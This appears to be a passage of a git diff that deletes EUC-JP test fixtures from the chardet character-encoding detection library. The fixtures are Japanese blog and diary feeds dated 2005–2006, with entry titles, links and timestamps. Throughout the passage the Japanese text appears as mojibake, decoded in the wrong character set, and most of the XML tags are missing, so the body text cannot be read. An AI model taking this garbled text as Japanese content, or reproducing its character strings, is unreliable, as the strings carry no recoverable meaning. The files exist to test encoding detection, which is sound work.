·₪ֶ¹חְ®₪·₪ֶ₪·₪₪¨₪׀₪₪₪₪¡£₪ֹ₪ֱ₪י₪«₪ָ₪₪₪¨₪׀¥י¥װ¥ו¥¿₪ה¥ָ¥ָ¥ם₪הֻג½קֲנ₪־¥ַ¥ױ¥©¥כ¥ב₪·₪¿¼«ֱ³ֱֹ¼ּ₪־₪₪¦₪¬ְ®¸ש₪·₪ֶ₪₪₪¿¡£ְ®¸ש₪·₪ֶ₪₪₪¿¥₪¥³¡¼¥כ¡¢¸ִ¿ֵֽ×₪ֻ¹¥₪­₪ְ₪ֳ₪¿¡£ֱֹ₪­₪³₪₪₪₪¥ך¥¢¥ך¥÷¥א¡£
    -¡¡
    -

    ¡צ¡צ¡צ


    -¡¡
    -¡¡±ְ₪־צ ₪₪₪¯₪ִר¡₪¯₪÷¡ֻ₪ל₪ֶ ·מ₪־»³¡¡¡¡¡¡ַ־¾ײ
    -¡¡
    -¡¡ַ־¾ײ₪ֱָ½־ֹ₪¬½׀±©₪ֶֻ‏₪ֳ₪¿¿·־׀₪־µ¨ְב¡¢₪¿₪׃₪¿₪׃±«₪ֻ₪₪₪ן₪ל₪₪¹¡£±ף·₪ֿ₪־₪¾₪ב₪₪«₪ֳ₪¿₪ָ₪·₪ֶ₪גְמּ¸₪ה₪ג₪ה₪¬₪«₪ֳ₪¿»³ֲ₪₪ע¸«₪ֶ₪₪₪¿₪«₪ג₪·₪ל₪₪₪¡£±«ֵ·₪¬ַ־¾ײ₪¿₪ֱ₪ע₪½₪־ֳֵֿ₪ֻ¿א־±₪µ₪»¡¢₪«₪÷₪«₪÷₪־ּ¾¶ח₪ה¥¨¥װ¥½¡¼¥ֹ₪ע»ִ₪µ₪»₪כ₪³₪ָ₪ֻ₪₪ך₪₪¹¡£ּ׀µָ₪־₪×₪ֳ₪µ₪ף₪ג₪₪¿₪·₪«₪ך¡£
    -¡¡÷ַ¾וְמ¡£₪½₪ל₪«₪י»־®₪־´¨²ֿ¹¾¡₪µ₪¬₪¨¡ְֻמ¡¢¿¡₪¹¡ְֻמ¡¢ַֿ¸«¥צ÷ך¡₪₪₪¬₪µ₪­¡ְֻמ¡¢־©ֳ«ְמ¡₪¿₪ֱ₪ה₪¬₪ן¡ֻ¡£ֵלְ¾₪ֻ»³ֳֿ¡¦»³ּ®₪ֻ₪µ₪¨₪®₪י₪ל₪¿ֲ¼»³ֳֻֿ₪ֿ¡¢²ֶ₪ֿ₪¢₪¿₪¿₪₪ֳ₪¿¶ץµ₪₪¬¡¢ֵ₪ֿ־הµ₪₪¬־®₪ל¹‏₪ף₪ַ₪ָ₪ֹ₪₪כ¡£¾ע·ן₪¬₪½₪ם₪¦₪־₪ַ¡¢₪³₪־°לֲ׃₪ֿ»ֽµ¨₪עִּ₪¸₪ֶּ¸₪ה¥ג¥ה₪¬₪¿₪ֱ₪³₪ב₪ה₪¹₪₪¡£¾¼ֲֿ£¸ַ¯£··מ¡¢40.8 ¡מ₪ָ₪₪₪¦¹סֶג÷ַ¹גµ₪²¹₪ע´ֲׁ¬₪·₪¿µ­ֿ¿₪ג÷£₪₪×₪ה₪ײ₪י₪ל₪ֶ₪₪₪₪₪¡£₪ִ₪י₪ִ₪י¹ֽ₪¨₪כ₪ֻ₪³₪־µ₪¸ץ¾ע·ן¡¦־©ֳֿ¾ע·ן₪ָ¡¢½׀±©»°»³₪ָ₪₪₪¦¥ז¥ֻ¡¼¥¯₪»³³½₪¸³₪¬ָ¯ְ¸₪·₪ְֶי¿פֹ´ַ¯´ײ₪ֻ₪₪₪¿₪כ₪³₪ָ₪ָ₪ֿ¡¢₪×₪½₪י₪¯¶צֱ³₪ַ₪ֿ₪¢₪ך₪₪»₪ף¡£
    -¡¡
    -¡¡ְןֱט₪־µ­ֿ¿₪ֻ₪ֿ¡¢₪½₪־ֶ₪־¾÷₪ֵ·¸ץ₪¬µ­½ׂ₪µ₪ל₪ֶ₪₪₪כ₪³₪ָ₪¬₪·₪׀₪·₪׀₪¢₪ך₪₪¹¡£₪½₪ל₪ע¼ך₪¬₪«₪ך₪ֻ¡¢°ץ¾ֵ×₪־ע»ֵֻ×ְןֶ®¥·¡¼¥ף₪¬ּ¸₪־¾נ·₪ע₪ָ₪ג₪₪ֳ₪ֶ±ֱַ₪־ֳז₪ֻ÷ֶ¸½₪µ₪ל₪₪¹¡£ּ¸¡£»כ³¦₪ע₪¦₪׀₪ן₪ל₪כ₪ָ₪₪₪¦₪³₪ָ₪ְֿןֶ®¥×¥¥ל¡¼¥·¥ח¥ף₪־¿כ¹װ₪ֻ÷ֵַ¬¡¢¹¶₪ב₪כ₪ֻ¹¥¾ע·ן¡£¶זֽר²ְֽו¡₪¯₪ך₪«₪י¡ֶֻ½¡¢²³¶¹´ײ₪־ְן₪₪¡¢ַֻ½»₪־ׁ¡¢ְמֳזֵח₪־ְן₪₪¡¢¥־¥כ¥¥ף¥ַ¥£¡¼¾ו־¦¡¢ִ»±©ֹת¸«₪־ְן₪₪¡¢׳×¹ֲ¶¶¡₪ם₪³₪¦₪­₪ח₪¦¡ֻ»צ·ן¡£¡ֽ׳³־ַ§¡ֻ
    -¡¡
    -¡¡ְּ¼£ֿ»ַ¯¶ו·מ¡£ְ¾ְמ¿²לֽ÷₪¬₪ֿ₪¸₪ב₪ֶ±©¹ץ»³₪״²ןהֶ¡₪«₪´¡ֻ₪ַֻ¬₪ל₪¿₪ָ₪­¡¢¾®±«₪¬¹₪ֳ₪ֶ₪₪₪¿¡£
    -¡¡·ִ±‏»ַֽ¯»°·מ¡¢¾וּמ₪־´²±»₪ַ¾´µֱֲג₪¬ֻ₪·ג₪ֻ₪¢₪¦₪־₪ג±«₪־ֳז¡£±¼»ֽ·מ¡¢»²¸»₪ֻֻ¿״₪עֳײ₪₪₪¿¾±ֶגָֽ₪ֿ¡¢´±·³₪־¿½׀₪·₪ֶ₪₪₪¿ֵ·ֶ¸₪עַ»ּ¸₪־₪₪«¹¶·ג₪¹₪כ¡£²‏¸µ₪·₪ְֶּ¼£¸µַ¯¶ו·מֶף¡»ֶ¡£ֱבִ«ַ»ּ¸₪־ֳז¡¢´¨²ֿ¹¾₪ֻ₪ֶ´±·³₪ָ°ְֻס¦·¬ּ¾ָֽ»־₪י₪¬¸עְן₪¹₪כ¡£·¬ּ¾·³₪ֿ₪½₪־ֶ₪־ּכ¡¢»²¸»₪«₪יֽױ»³₪ע₪³₪¨ֹ×ְ₪₪ַַװֱצ₪¹₪כ¡£ֶףֶ¸ו¡¢²סִֵָֽ₪¬¹ֹת¡£₪½₪־ֽגֶ₪ֻ¾±ֶגָֽ₪ג¹ֹת₪ע·טִך₪¹₪כ¡£
    -¡¡
    -¡¡
    -¡¡
    -¡¡2005.10.17¡¡¾ו³₪₪ֻ₪ֳֶַ¶ג»אµמ¡£µ‎ַ¯100¡£
    -¡¡2005.10.29
    -¡¡₪·₪ְ₪ׂ₪ם₪·¡¿PoorBook G3'99
    -¡¡ֵ¾÷¡¦°תֽׁ¡¦¥ך¥ף¥¯₪ֿ¼«ֽ³₪ַ₪¹¡£

    ]]> -
    -movie -PoorBook G3'99 -2005-10-29T08:05:59+09:00 -
    - - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/tls.org.xml b/chardet/tests/EUC-JP/tls.org.xml deleted file mode 100644 index c79cb3b..0000000 --- a/chardet/tests/EUC-JP/tls.org.xml +++ /dev/null @@ -1,259 +0,0 @@ - - - - -₪ֿ₪«₪¿¹ז¹¶־¬ֶµ­ -http://www.tls.org/~moriya/diary/ -₪ֿ₪«₪¿¹ז¹¶־¬ֶµ­ Recent -₪ג₪ך₪ה₪¿₪«₪ױ₪ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ¶µ»צֲײ - http://www.tls.org/~moriya/diary/?200601a#200601033 - ¥ָ¥»¥₪£²¹ז₪¬±¿ֵ¾¸«¹ח₪ן₪»ֳז¡¢¥¦¥ה₪ֿ₪₪₪₪י₪·₪₪₪¬¡¢¾וּמ₪ֻ₪ֿ²¿»‏₪ֳֻו₪¯₪ף₪ְ₪ם¡© - 2006-01-03T09:33:46+09:00 - - - ₪µ₪¡¼₪ם±״ - http://www.tls.org/~moriya/diary/?200601a#200601032 - ¶צֱ³₪ֻ₪ג¥ֽ¥¿£װ£ײ¶ֹ°ק₪ֻ°©₪¦¡¢₪׃₪ֳ₪¯₪ך₪·₪¿¡¢ּ¼₪µ₪ף₪¬₪«₪₪ךְ®ִ¹₪·₪ֶ₪×₪כ₪ - 2006-01-03T09:33:46+09:00 - - - ₪­₪ֹ₪¦ - http://www.tls.org/~moriya/diary/?200601a#200601031 - £¹»‏¡¢₪µ₪ֶµ¢₪כ₪« - 2006-01-03T01:36:21+09:00 - - - °°»³ֶ°×±א - http://www.tls.org/~moriya/diary/?200601a#200601022 - ÷£ֶ₪«₪י³«±א₪י₪·₪¯¡¢¥¥ף¥®¥ף₪־₪×»¶גֵּצ₪ֶ₪ֻ¡¢₪·₪«₪·¿¿ֵ₪ֻ¥י¥¯¥ְ₪ָ₪«¥·¥ו¡¼¥כ₪ְ₪¡£ ¥¥ף¥®¥ף₪־₪×»¶ג¥×¥ב¥¬₪«₪ן₪₪₪₪¡¢₪ֱ₪¦₪«₪₪₪₪₪₪³₪ל - 2006-01-02T10:01:25+09:00 - - - µ¯ֶ° - http://www.tls.org/~moriya/diary/?200601a#200601021 - ₪₪ף₪ְ₪«₪ף₪ְ₪ַ£±£±»‏¡¢₪¦₪°₪¥ָ¢÷¬₪־£³¶ט₪ע¸«ֶֿ₪±₪ֶ₪«₪י¹װֶ°³«»ֿ - 2006-01-02T10:01:25+09:00 - - - VSE - http://www.tls.org/~moriya/diary/?200601a#200601014 - ֵ½₪כ₪־ֻ÷₪ל₪ֶ₪¿¡¢₪«₪³₪₪₪₪₪ַ₪¹₪ט¡¢₪ֱ₪ִָ¹₪₪₪±₪ֹ¡£ - 2006-01-01T10:36:28+09:00 - - - JL1105 - http://www.tls.org/~moriya/diary/?200601a#200601013 - ¼¯»שֵח₪«₪י₪־µ¡÷אֳ₪ל₪ָ¡¢¹±־ד₪־±©ִֵ₪־־¥־¦ֲװ₪ֱ¹װ־ף₪ַ£²£µ¬₪°₪י₪₪₪־ֳ₪ל₪ַ־¥־¦¡¢₪ֵַ‏ֳו₪ֿ£±£µ¬ִרֳֵ₪ל¡¢AKJ₪ֿ-8¡מ₪°₪י₪₪¡¢ֳָ₪«₪₪₪ַ₪¹₪ט¡©₪·₪«₪·₪₪₪ִ₪־´ײ₪ֻ₪«A300-R600₪־¥ג¥ֻ¥¿₪¬¥ײ¥י¥¦¥ף´ֹ₪«₪י¡¢... - 2006-01-01T10:36:28+09:00 - - - HND - http://www.tls.org/~moriya/diary/?200601a#200601012 - ₪₪־₪ף»ױ¾¢₪ָ¶צֱ³₪ֱֻר¶ר¡¢ֶ±₪¸״₪י₪·₪₪ - 2006-01-01T01:33:34+09:00 - - - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ - http://www.tls.org/~moriya/diary/?200601a#200601011 - ÷£ַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡£₪ָ₪«¥¢¥ֻ¥¹¥ׁ₪ַַ¯₪ע±₪¹₪ן₪·¡¢÷£ַ¯₪ֿ₪ב₪¬₪ּֽ¼₪־ײא½ק₪µ₪ף₪¬¸«₪ל₪כ₪«₪¡ד₪ַ₪ג¿ְ¼ׂ₪ֻ₪ֿ¹װ₪«₪₪₪₪ֻ₪ח₪¬₪ף - 2005-12-31T15:06:36+09:00 - - - ַ¯±₪· - http://www.tls.org/~moriya/diary/?200512c#200512313 - ₪ַ¥¢¥ֻ¥¹¥ׁ¡£ק÷£ַ¯₪ֿ₪ׂ₪µ₪׃₪µ₪ֶֻ±₪¸²ס¼ׂ₪ֻµן₪¿£±ַ¯₪ְ₪ֳ₪¿₪¡¢ֳֶ₪ֻ₪ׂ₪ֹ₪₪ּ₪ֻ₪גֱר₪ן₪₪«₪ֳ₪¿₪·¡¢ֽטַ¯₪ְֿ¼ֽ¥₪ֱָר¶ר₪ָ₪«₪½₪¦₪₪₪¦₪₪₪₪₪³₪ָ₪¬₪¢₪כ₪ָ¥₪¥₪¥ - 2005-12-31T14:35:45+09:00 - - - ÷£ַ¯₪־¥¢¥ֻ¥ב - http://www.tls.org/~moriya/diary/?200512c#200512312 - ÷£ַ¯₪ֿ¿ְ¥¢¥ֻ¥ב₪¬ֲ¿₪«₪ֳ₪¿₪־₪ַ¡¢¼«¬´נ½א₪ַ¥י¥ף¥­¥ף¥°₪·₪ֶ₪₪ט₪¦¡£ 1°ּ¡¡Air÷מ²ט¥ל¥¥כ¡¢¥·¥¥ך¥×₪ָ¸¶ח₪־ּµ₪₪¥ל¥¥כ₪ַ₪־÷מֹ¡¢ֽ₪ע¸ְ₪¨₪׀£±¥¯¡¼¥כ₪ַ₪ֿ¼₪¬ֲ­₪ך₪₪₪₪°₪י₪₪₪«¡¢... - 2005-12-31T06:36:35+09:00 - - - ₪­₪ֹ₪¦ - http://www.tls.org/~moriya/diary/?200512c#200512311 - £±£´»‏¡¢₪ט₪¯¿²₪¿¡£ - 2005-12-31T06:36:35+09:00 - - - NEWS-16 - http://www.tls.org/~moriya/diary/?200512c#200512304 - ²ס¾ל₪ֻ₪ֿ³«»ֿ₪ֱ₪ח₪₪ֱ°₪ֶֻ‏¾ל¡¢÷£²ף₪ֿKNS¡¡ײ¡׳¥ֶ¡¼¥ײ¥כ₪ֳ₪₪₪₪₪ֻ₪«¡¢₪·₪«₪·¿ֽ¿פ₪¬£´£°¿ֽ₪ַ₪ג¼«¸¾ׂ²נ₪ֻ£²»‏´ײ³₪«₪כז«¡¢₪ָ₪ך₪¢₪¨₪÷ֻ×₪¬µן₪₪₪₪־₪ַ¡¢¡ײֳִֵ¼₪«₪יֽט₪₪·₪¿¡׳₪ָ₪«¸ְ₪ֳ₪ֶ₪₪¿₪ך¡£... - 2005-12-30T15:36:32+09:00 - - - ֲַ₪ֱ¾ו₪²₪ֳ₪₪₪₪₪ֻ₪« - http://www.tls.org/~moriya/diary/?200512c#200512303 - ¹ֵֻח³¹ֶ»±ט₪₪₪־¥µ¥₪¥¼¥ך¥¢₪ַ¡¢₪³₪־₪¢₪ָNEWS₪¬₪¢₪כ₪־₪ַ¥¹¥₪¡¼¥ִ₪ַ¡¢₪·₪«₪·¥׳¥ך¥ף₪ָ¥¸¥§¥י¡¼¥ָ₪עֽך₪א₪ן₪· - 2005-12-30T15:36:32+09:00 - - - CM69¡¡£²ֶּ - http://www.tls.org/~moriya/diary/?200512c#200512302 - ₪₪ף₪«¥ֱ¥±¥ֳ¥ָ₪¬ֽ¾₪ֳ₪ֶ₪₪¹¡¢₪ָ₪₪₪¦₪³₪ָ₪₪־₪ַ״¾ט₪µ₪»₪ֶ₪ג₪י₪₪₪₪¹₪¿¡¢₪¹₪¿ְ¾´₪־¡ײ¡׳ֵח₪ֿ´¨₪«₪ֳ₪¿₪ַ₪¹¡¢ֹק₪־ִּ₪ךֶ»₪₪ף₪ְ₪ג₪־₪¡£ - 2005-12-30T15:36:32+09:00 - - - ₪­₪ֹ₪¦ - http://www.tls.org/~moriya/diary/?200512c#200512301 - £°£µ£³£°¡¢₪₪₪₪א₪ֽ₪ֱ₪¦₪«²¾ּ² - 2005-12-29T20:36:22+09:00 - - - ֻגֻ¡¾¯½ק¥ך¥ך¥«¥כ₪₪־₪ֿA's £±£³ֳֿ - http://www.tls.org/~moriya/diary/?200512c#200512295 - ¥¨¥װ¥ם¡¼¥°¡¢₪­₪ל₪₪₪½×₪ן₪ך₪«₪¿₪ְ¡¢÷מ²ט₪ע½₪₪₪ֶ₪ֿ₪½₪·₪ֶ₪₪־₪ֿ₪µ₪ף₪ֿ¥ֿ¡¼¥ָ¥¥ף·³ֱגְןµ»¶µ´±₪ֻ¡¢₪ֳ₪ֲֶ¾¿ֽ₪ֻ¿¿»ק₪ַ₪­₪כ₪ף₪«¡¢ּµֵ¨₪־¥׀¥ך¥¢₪ַ¹¶·ג₪עֹֻ₪®ְ₪ך¡¢°µֵֵ×₪²׀־ֿ₪ע°₪ֵֶ¨₪ע₪ֽ₪¸ֹת₪»₪כ¡¢... - 2005-12-29T17:31:11+09:00 - - - ₪®₪ד¡¼ - http://www.tls.org/~moriya/diary/?200512c#200512294 - TU-MHD500₪¬ֹו₪ֳ₪ֶ₪¿¡¼¡¢₪₪־₪ֿ₪µ₪ף₪־OP¼ט₪ךֶ¨₪¬₪·₪¿₪ - 2005-12-29T17:31:11+09:00 - - - ₪׀₪ף₪ב₪· - http://www.tls.org/~moriya/diary/?200512c#200512293 - ₪׃₪ֳ₪¯₪ך₪ֹ₪ף₪­¡¼₪ַ¥«¥ך¡¼¥׀¡¼¥°¥ַ¥£¥ֳ¥·¥ו - 2005-12-29T17:31:11+09:00 - - - ÷£ֶ°לֶ - http://www.tls.org/~moriya/diary/?200512c#200512292 - ₪₪ף₪«¡¢₪₪ף₪ֻ₪ג₪·₪₪₪₪ַ½×₪ן₪ֳ₪ֶ₪·₪₪ֳ₪ִ¡¢₪¦₪°₪¥₪ב₪·₪ג₪¯₪ֳ₪ֶ₪ֽ₪§¡¢ְֶּ₪ֵֿל2 K-08a₪ֻµן₪כ₪«₪ג - 2005-12-29T15:31:25+09:00 - - - ₪­₪ֹ₪¦ - http://www.tls.org/~moriya/diary/?200512c#200512291 - £±£´»‏¡¢¿²²ב₪®₪ָ₪ך₪¢₪¨₪÷¶ה¹װ¹װ₪ֳ₪ֶַ¯ֻצ»ס¶ג₪ע₪×₪ם₪·₪ֶ¡¢ֻ¨²¦₪ָ₪«÷÷¼‎ - 2005-12-29T07:56:33+09:00 - - - ¥י¥א¥ֽ ÷ַ½×ֳֿ - http://www.tls.org/~moriya/diary/?200512c#200512283 - ·ע₪ֱ₪ד₪ף₪ֽֿ₪¿₪ף¾ץֲײ₪«¡¢¥׳¥ל¥₪¥ה¡¼¥­¥ד¥י₪¬₪³₪¦₪₪כ₪ָ₪«³ה₪ָ¿·ֱ¯₪ְ₪¡¢₪ַֻטֶ³״¹»₪µ₪₪ֳ₪ֶ₪׸«ֹס₪₪₪ֻ₪₪ף₪³₪ִ₪¬ְ₪₪₪¡¢₪ֱ₪¦₪«₪₪ף₪ָ₪ֻ₪₪ף₪³₪ִ₪¬¸־¾ד₪·₪ֱ₪ד₪¦¡×¥ֶ¥±¥¹¥¿... - 2005-12-28T17:36:33+09:00 - - - ₪«₪¨₪ך - http://www.tls.org/~moriya/diary/?200512c#200512282 - ²¶¥ױ¥§¥ֱ₪₪₪ֱ₪´₪ֱ₪ד₪ףµ₪₪ע₪ִ₪±₪ֶ£²¡¢£³₪ָIM@S¥­¥ד¥י¥¯¥¿¡¼¥¥¹¥¿¡¼₪עֶֹ₪₪ִ₪ִµ¢ֲנ - 2005-12-28T16:01:11+09:00 - - - ₪¢₪µ - http://www.tls.org/~moriya/diary/?200512c#200512281 - £°£¸£±£µµ¯ֶ°¡¢₪₪₪₪א₪ֽ£µ»‏₪ֻ¶»¾ֶ₪±₪ַּ₪ע³׀₪₪·₪ֶ¥ָ¥₪¥ל₪ָ₪×ֽ§ֳ£₪ְ₪ֳ₪¿₪ך¡¢₪·₪¿₪ן₪±₪ַ₪°₪ף₪ֻ₪ח₪ך¡¢₪·₪«₪·ֲ־ִ´₪¬₪½₪ף₪₪ֻ°­₪₪₪ן₪±₪ַ₪ג₪₪¯¡¢÷עָױ₪ֻ¿©₪₪¿₪×₪ִ₪ָ₪בֹ₪־»ֹ¿ָ₪¬¸¶°ר₪₪ף₪«₪¡¢... - 2005-12-28T01:31:13+09:00 - - - ְֶּ₪־ֽ½ֱµ₪²¹ - http://www.tls.org/~moriya/diary/?200512c#200512273 - -6¡מ₪ָ₪«¡¢´נֵֻ×₪ֻ₪ֿ₪¢₪ָ10¡מ₪ֿ²¼₪¬₪ֳ₪ֶ₪גֲח¾זֹ׳₪ְ₪¬¡¢²ָ₪־ֲ₪₪ך₪¬ֲׁ₪¨₪י₪ל₪₪₪₪«₪ג¡¼¾ו¶ץ₪־´¨µ₪₪־²¹ֵ₪¬ֳ־₪ך₪¿₪₪₪¬¡¢₪½₪ף₪ֵ·µ₪¿÷₪»₪ֶ₪כ₪ָ₪³₪¢₪כ₪ף₪«₪¡£ - 2005-12-27T16:51:54+09:00 - - - ₪«₪¨₪ך - http://www.tls.org/~moriya/diary/?200512c#200512272 - ֵ·ְµ₪ה₪×₪ט₪ם₪÷£·₪ָ₪«ֶֹ₪₪ִ₪ִµ¢ֲנ¡¢₪ֱ₪¦₪«´¨₪₪₪ֽ - 2005-12-27T16:51:54+09:00 - - - ₪¢₪µ - http://www.tls.org/~moriya/diary/?200512c#200512271 - £°£¸£³£°µ¯ֶ°¡¢₪₪₪₪א₪ֽ₪ֱ₪¦₪«£¸»‏₪ֻּ₪¬³׀₪ב₪¿₪ף₪ְ₪¬¡¢¼¡₪־°ל½ײ₪ֿ£³£°¬¸ו₪ז«¡¢₪ַ¿·²£₪ַ₪׃¡¼₪¢₪ף₪׃₪·₪ד₪¹¾ט´¹₪ָ»׳₪ֳ₪¿₪י¡¢÷£ֶ₪גֳ±ה₪·₪ֶ₪כז«¡¢₪₪¢»‏´ײֵ×₪ֻ₪ֲֿח¾זֹ׳₪ְ₪ֳ₪¿₪¬¡¢... - 2005-12-27T01:26:39+09:00 - - - ֵלָ·£² £±£²ֳֿ - http://www.tls.org/~moriya/diary/?200512c#200512264 - ₪ַ₪₪₪₪₪ף₪«¡©¡¢₪ז₪ך₪·¡¼₪ֻ½ױ₪¬ֽט₪¿װ¡¢₪ֱ₪¦₪ן₪±₪ַ¼‏₪ך₪¬ָשּ¯₪ְֻ¹₪ך¾ו₪²₪ִ₪ִ¡¢¥¿¥«ֻ·₪־ּµָֹֻק₪¿²´י₪ֻ½±₪₪₪«₪«₪ך₪½₪¦₪ֻ₪₪כ₪ז₪ך₪·¡¼¡¢₪·₪«₪גּ₪¿כ₪ַ₪׀₪ל¡¢₪ַ₪ז₪ך₪·¡¼₪ֻֿו₪ֳ₪₪₪₪₪ֻ₪«ְכ¸ְ₪ַKO₪µ₪ל₪ֶ₪ז₪­₪₪־₪´₪ָ₪¯... - 2005-12-26T20:01:02+09:00 - - - ¥¥ן¥₪¥ָ¥¹¥ָ¡¼¥ף¥÷ - http://www.tls.org/~moriya/diary/?200512c#200512263 - ₪¬¿ְֶאְמ₪ַ¸«₪י₪ל₪כֹװ»׳µִ¡¢₪½₪·₪ֶUGA₪ֻ¡ײְן₪¨¡×ַע₪­ְן»־¡¡£ַ£ן¡×£ַ£ן¡×£ַ£ן¡×¡׳₪¬ֹװ»׳µִ - 2005-12-26T20:01:02+09:00 - - - ₪«₪¨₪ך - http://www.tls.org/~moriya/diary/?200512c#200512262 - £²£°£¹´¨₪₪₪ט¡¢´¨₪₪₪ט£²£°£¹IM@S¥ֹ¥י¥£ֳ£ִ₪־₪ז₪ך₪·¡¼₪ֻ₪ה₪ה¡¢₪ה₪י₪ל₪ִ₪ִµ¢ֲנֳז - 2005-12-26T13:55:08+09:00 - - - ₪¢₪µ - http://www.tls.org/~moriya/diary/?200512c#200512261 - £°£¸£±£°µ¯ֶ°¡¢₪₪₪₪א₪ֽ₪₪₪₪א₪ֽ²ב₪®₪ֶ₪ְ₪ב₪¡¢₪ָ₪ך₪¢₪¨₪÷ִּ¶׀₪ְֿמ÷ך₪ַ÷ְֲ³־₪ַ₪₪ף₪ָ₪«¡£ - 2005-12-26T01:31:02+09:00 - - - ₪«₪₪₪ג₪־ - http://www.tls.org/~moriya/diary/?200512c#200512253 - ₪³₪ף₪ָ₪³₪ם₪־£ֳ£ִ₪ָ₪« ₪י₪­¡ש₪¹₪¿ vocal mini album¼ֲ¼ֱ£²¶₪ַ₪³₪־ֳֳֽ₪ֿ₪׃₪₪ח¡¼¡¢₪ַ₪ג¥×¥ָ¥ב¡ש¥´¥´¥ם₪ַ°¦₪ֻ₪ד₪ף₪ָ₪₪ז₪₪ז₪¬°ל½ן₪₪־₪ַַד₪ן₪₪₪₪ע₪¹₪כ₪ט₪¬... - 2005-12-25T12:01:07+09:00 - - - ¥ן¥₪¥ׁ¡¼¸ע´¹ - http://www.tls.org/~moriya/diary/?200512c#200512252 - ½½ֶ»װ¾ל₪־¥¹¡¼¥ׁ¡¼¥×¡¼¥ָ¥׀¥ֳ¥¯¥¹₪ַ¡¢¥ן¥₪¥ׁ¡¼₪ע¥ך¥¢₪־ֲ״₪¨¥´¥א₪ָ¥ױ¥ם¥ף¥ָ£²ֻ¡¢₪¢₪ָ¥¦¥£¥ף¥ֹ¥¦¥©¥ֳ¥·¥ד¡¼₪ע¹״ֶ‏₪·₪ֱֶבֲ®¸ע´¹₪ג₪׳°´¨₪₪₪ט¡¢₪¢₪ֵָֽׁ¥ײ¥ל¡¼¥ַֹה₪ֳ₪ֶ₪₪»₪ף¡£ק... - 2005-12-25T12:01:07+09:00 - - - ₪­₪ֹ₪¦ - http://www.tls.org/~moriya/diary/?200512c#200512251 - £±£³»‏¡¢₪ט₪¯¿²₪¿ - 2005-12-25T05:13:14+09:00 - - diff --git a/chardet/tests/EUC-JP/yukiboh.moo.jp.xml b/chardet/tests/EUC-JP/yukiboh.moo.jp.xml deleted file mode 100644 index bd6ae00..0000000 --- a/chardet/tests/EUC-JP/yukiboh.moo.jp.xml +++ /dev/null @@ -1,184 +0,0 @@ - - - - - -₪₪¹₪¬₪₪ -http://yukiboh.moo.jp/weblog/ -₪₪¹₪¬₪₪¡¢־®₪ל₪ֻµױ₪י₪ן₪÷₪ֻ¸×₪־־ֿ₪עָ´₪₪₪ֶ -ֶ¡¹₪ע²ב₪´₪·₪ֶ₪₪₪­₪¿₪₪¡£ -ja - -2006-01-01T16:06:14+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -¶א²ל¿·ַ¯ -http://yukiboh.moo.jp/weblog/archives/000538.html - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ₪¹₪ֳ₪«₪ך¥ײ¥ם¥°ֳײ₪·₪₪¯₪ך₪־£±ַ¯₪ַ₪·₪¿₪¬¡¢÷£ַ¯₪ֿ¾¯₪·₪₪¸₪ב₪ֻ¼ט₪ךֱָ₪ף₪ַ₪₪₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£ ַֻ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪₪₪¿₪·₪₪¹¡£... -Essay -₪ז₪­ֻ· -2006-01-01T16:06:14+09:00 - - -¥¹¥¥ױ¥­¥ף₪עֳµ₪»¡× -http://yukiboh.moo.jp/weblog/archives/000537.html -³ֵ·₪ָ¥י¥¥כ₪ַ₪ֿ¡¢ 9·מ1ֶ¡ֱ9·מ30ֶ₪₪ַ¡¢¥¹¥¥ױ¥­¥ף₪עֳµ₪»!¥­¥ד¥ף¥¡¼¥ף₪ע₪ה₪ֳ₪ֶ₪₪₪ֶ¡¢½ַֹס·פ¡¢³ֵ·¥¹¡¼¥ׁ¡¼¥¥₪¥ף¥ָ¡¢¥¹¥¥ױ¥­¥ף¥¹¥ֶ¥ף¥ל¥¹¥¿¥ף¥ײ¥י¡¼₪₪ֹ₪¬¹ח·׳111ּ¾₪ֵֻצ₪¿₪כ₪ט₪¦₪ַ₪¹¡£ ¥¹¥¥ױ¥­¥ף¥°¥ֳ¥÷₪¬₪₪₪₪₪₪¡¡ֱ... -Web -₪ז₪­ֻ· -2005-09-22T06:37:35+09:00 - - -Flickr₪ֻ·ֲָ׃₪ֵַך¹ֶ -http://yukiboh.moo.jp/weblog/archives/000536.html -au¡¢₪₪¿₪₪¿¿·µ¡¼ן₪ַ₪¹₪«¡£ -₪₪«₪₪«ַּּע₪₪¥י¥₪¥ף¥¥ֳ¥׳₪ַ₪¹₪¬½ױ₪ַֻד₪₪ֲ״₪¨₪¿₪׀₪«₪ך₪₪ף₪ַ₪¹₪ט₪ֽ₪§¡ִ -₪ָ₪³₪ם₪ַ¡¢Flickr!₪¬¥ב¡¼¥כ₪ַ¹¹¿·₪ַ₪­₪כ₪ֳ₪ֶ¡¢÷£¹¹₪₪¬₪יֳ־₪ך₪₪·₪¿(^^; -sns -₪ז₪­ֻ· -2005-06-03T07:02:45+09:00 - - -¥½¡¼¥·¥ד¥כ¥ײ¥ֳ¥¯¥¡¼¥¯ Kaiba.JP -http://yukiboh.moo.jp/weblog/archives/000535.html -¢£¥½¡¼¥·¥ד¥כ¥ײ¥ֳ¥¯¥¡¼¥¯ Kaiba.JP ¡¡http://kaiba.jp/ ₪ט₪µ₪²₪ְ₪ֳ₪¿₪־₪ֵַ׀ֿ¿₪·₪ֶ₪₪₪·₪¿¡£ ¢£yukiboh ¸ר³«¥ײ¥ֳ¥¯¥¡¼¥¯ http://kaiba.jp/resources/brain/member.php?uid=47"> ₪₪«₪־¥½¡¼¥·¥ד¥כ¥ײ¥ֳ¥¯¥¡¼¥¯₪ט₪ך₪ג»ָ₪₪¾¡¼ך₪¬־ֹ₪¯¥µ¥₪¥ָ₪־¥ָ¥ֳ¥׳²טּּ₪¬¥׃¥¸¥ו¥¢¥כ₪ַֹ½¼¨₪µ₪ל₪כ₪₪ֹ¸«₪¿ּ₪ג¥¹¥¡¼¥ָ₪ַ₪¹₪ֽ¡£ 